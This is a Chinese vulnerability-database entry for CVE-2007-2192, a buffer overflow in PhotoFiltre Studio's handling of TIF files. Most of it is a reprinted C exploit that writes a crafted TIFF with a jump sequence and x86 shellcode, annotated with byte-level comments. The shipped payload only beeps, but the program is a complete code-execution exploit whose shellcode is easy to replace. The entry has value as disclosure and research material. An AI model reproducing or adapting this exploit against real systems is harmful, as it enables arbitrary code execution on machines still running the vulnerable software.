Photofiltre Studio畸形TIF文件缓冲区溢出漏洞

漏洞ID 1112752 漏洞类型 缓冲区溢出
发布时间 2007-04-21 更新时间 2007-04-25
CVE编号 CVE-2007-2192 CNNVD-ID CNNVD-200704-422
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/3772
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-422
|漏洞详情
PhotoFiltre Studio 是来自法国的一款功能强大的图片编辑软件。PhotoFiltre Studio 在处理畸形的 .TIF 图形文件时存在缓冲区溢出，可能导致执行任意指令。
|漏洞EXP
/********************************************************************************
*                                                                               *
*            Photofiltre Studio v8.1.1 .TIF File Buffer Overflow                *
*                                                                               *
*                                                                               *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file.                                                            *
* This exploit just beeps (useless but incredibly noisy!!).                     *
*                                                                               *
* Tested against Win XP SP2 FR.                                                 *
* Have Fun!                                                                     *
*                                                                               *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/

#include "stdio.h"
#include "stdlib.h"

// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
//
// 35-byte x86 stub (main() copies sizeof(beepsp2)-1 bytes). It only makes a
// noise. As far as the bytes show: a frame prologue, one hard-coded absolute
// address stored in a local, two 32-bit arguments written at [esp] and
// [esp+4], an indirect call through that address, then leave/ret.
// The address is build-specific (the author notes XP SP2 FR), so on any other
// Windows build the call goes to an unrelated location and the target process
// most likely just crashes.
unsigned char beepsp2[] =
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"   // push ebp; mov ebp,esp; sub esp,0x18; mov [ebp-4], <imm32 on next line>
"\x77\x7A\x83\x7C"                      //Address \x77\x7A\x83\x7C = SP2 (little-endian, i.e. 0x7C837A77)
"\xC7\x44\x24\x04"                      // mov dword [esp+4], <imm32 below> (second argument)
"\xD0\x03"                              //Length \xD0\x03: little-endian 0x03D0 = 976 ms, NOT 2000 as originally claimed (2000 would be \xD0\x07)
"\x00\x00\xC7\x04\x24"                  // high half of the length; mov dword [esp], <imm32 below> (first argument)
"\x01\x0E"                              //Frequency \x01\x0E = 3585 (0x0E01)
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3"; // high half of the frequency; mov eax,[ebp-4]; call eax; leave; ret

// The complete 1360-byte TIFF image main() writes (85 lines x 16 bytes; the
// trailing literal NUL is dropped with sizeof-1). Despite the name there is
// no tif_file_part2 anywhere in the file.
// Offsets in the comments below are byte offsets into the file, little-endian.
// From a validation/detection standpoint the directory is already malformed
// before main() patches anything: several entries carry out-of-range type or
// count fields, and the declared 23 entries are not all present.
char tif_file_part1[] =
// 0x000: "II" = little-endian, magic 42, first IFD at offset 8; 0x008: entry count 0x0017 = 23
"\x49\x49\x2a\x00\x08\x00\x00\x00\x17\x00\xfe\x00\x04\x00\x01\x00"
// 0x00a-0x0d5: 17 twelve-byte entries, tags 0x00fe, 0x0100, 0x0101, 0x0102, 0x0103,
// 0x0106, 0x010a, 0x0111, 0x0112, 0x0115, 0x0116, 0x0117, 0x011a, 0x011b, 0x011c,
// 0x0128, 0x0129. Two are already out of spec: 0x0103 (Compression) has count
// 0x83 = 131, and 0x010a (FillOrder) has type 0xb6 (valid TIFF types are 1..12).
// 0x0111 (StripOffsets) and 0x0117 (StripByteCounts) each declare 55 LONGs at
// 0x122 and 0x1fe, i.e. inside the letter fill further down.
"\x00\x00\x02\x00\x00\x00\x00\x01\x04\x00\x01\x00\x00\x00\xfd\x01"
"\x00\x00\x01\x01\x04\x00\x01\x00\x00\x00\xb6\x01\x00\x00\x02\x01"
"\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00\x83\x00"
"\x00\x00\x05\x00\x00\x00\x06\x01\x03\x00\x01\x00\x00\x00\x03\x00"
"\x00\x00\x0a\x01\xb6\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01"
"\x04\x00\x37\x00\x00\x00\x22\x01\x00\x00\x12\x01\x03\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x15\x01\x03\x00\x01\x00\x00\x00\x01\x00"
"\x00\x00\x16\x01\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01"
"\x04\x00\x37\x00\x00\x00\xfe\x01\x00\x00\x1a\x01\x05\x00\x01\x00"
"\x00\x00\xda\x02\x00\x00\x1b\x01\x05\x00\x01\x00\x00\x00\xe2\x02"
"\x00\x00\x1c\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x28\x01"
"\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x29\x01\x03\x00\x02\x00"
// 0x0d6: entry 17 (tag 0x0131 Software) has type 0x4402, outside the valid range.
// From here on the bytes are an ascending-letter fill ("DCBA", then runs of
// E..O) rather than directory entries; main() overwrites from 0x0d5 onward.
"\x00\x00\x00\x00\x01\x00\x31\x01\x02\x44\x43\x42\x41\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4f\x4f\x4f\x4f\x4f"
// 0x4ad onward: the last 163 bytes are 16-bit little-endian values. None of the
// well-formed entries reference this region (their offsets all lie below 0x2ea);
// presumably leftover payload data from whatever image this file was derived from.
"\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x92\x00\x92"
"\x00\x96\x00\x00\x00\x00\x00\xaf\x00\x12\x00\x00\x00\x92\x00\x49"
"\x00\x12\x00\x92\x00\xaf\x00\x92\x00\x49\x00\x49\x00\x49\x00\x58"
"\x00\xaf\x00\x12\x00\x58\x00\x00\x00\x80\x00\x00\x00\x57\x00\x12"
"\x00\x5a\x00\x12\x00\x00\x00\x00\x00\x28\x00\x12\x00\x00\x00\x46"
"\x00\xfd\x00\xd5\x00\x1b\x00\xff\x00\xef\x00\xa9\x00\xd9\x00\x00"
"\x00\x70\x00\x6c\x00\xfa\x00\x99\x00\xc5\x00\xf7\x00\xb4\x00\x48"
"\x00\xab\x00\xe9\x00\xde\x00\x1b\x00\xff\x00\xd7\x00\x64\x00\xa9"
"\x00\xd9\x00\x6e\x00\x68\x00\x70\x00\x92\x00\xcc\x00\xf2\x00\x99"
"\x00\x94\x00\xe9\x00\xad\x00\xb4\x00\x4b\x00\xc9\x00\x85\x00\xe9"
"\x00\xe5\x00\xb4\x00\x80\x00\x98\x00\x8c\x00\xe0\x00\xc4\x00\x33"
;

/*
 * Entry point: copies tif_file_part1 into a local buffer, overwrites the bytes
 * from offset 0xd5 with a 9-byte pattern followed by beepsp2, and writes the
 * first 1360 bytes to the path given in argv[1].
 *
 * Returns 0 on every path, including the usage path and the fopen-failure
 * path, so the exit status cannot be used to tell success from failure.
 *
 * NOTE(review): memcpy is called but <string.h> is never included; the file
 * relies on an implicit declaration, which C99 and later compilers reject.
 */
int main(int argc, char* argv[])
{
	FILE* tiffile;
	char evilbuff[5000];   /* only the first 1360 bytes are ever initialised or written */
	int offset=0;

	printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflow\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	if (argc!=2) {
		printf("[+] Usage: %s <file.ttf>\n",argv[0]);   /* says .ttf, but the output is a .tif image */
		return 0;
	}

	/* 85 x 16 = 1360 bytes; sizeof-1 drops the string literal's NUL terminator */
	memcpy(evilbuff,tif_file_part1,sizeof(tif_file_part1)-1);
	offset=0xd5;   /* 213: the final value byte of IFD entry 16, just before the letter fill */
	memcpy(evilbuff+offset,"\x43\x43\xeb\x05\x8c\x08\xfc\x7f\x43",9); //pop pop ret in ??? + jump over EIP
	memcpy(evilbuff+offset+9,beepsp2,sizeof(beepsp2)-1);   /* 35 bytes, ending at offset 257, well inside the 1360-byte image */

	printf("[+] tif_file_part2 patched!\n");   /* there is no tif_file_part2; the message is stale */
	
	if ((tiffile=fopen(argv[1],"wb"))==0) {
		printf("[-] Unable to access file.\n");
		return 0;   /* reports success via the exit status even though nothing was written */
	}
	
	fwrite( evilbuff, 1, 1360, tiffile );   /* 1360 == sizeof(tif_file_part1)-1; short writes go unnoticed */
	fclose(tiffile);                         /* return value unchecked: a flush error is never reported */
	printf("[+] Done. Have fun!\n");
	return 0;
	
}

// milw0rm.com [2007-04-21]
|参考资料

来源:BID
名称:23582
链接:http://www.securityfocus.com/bid/23582
来源:MILW0RM
名称:3772
链接:http://www.milw0rm.com/exploits/3772
来源:OSVDB
名称:35265
链接:http://osvdb.org/35265
来源:XF
名称:photofiltre-tif-bo(33807)
链接:http://xforce.iss.net/xforce/xfdb/33807
来源:VUPEN
名称:ADV-2007-1490
链接:http://www.frsirt.com/english/advisories/2007/1490
来源:SECUNIA
名称:24981
链接:http://secunia.com/advisories/24981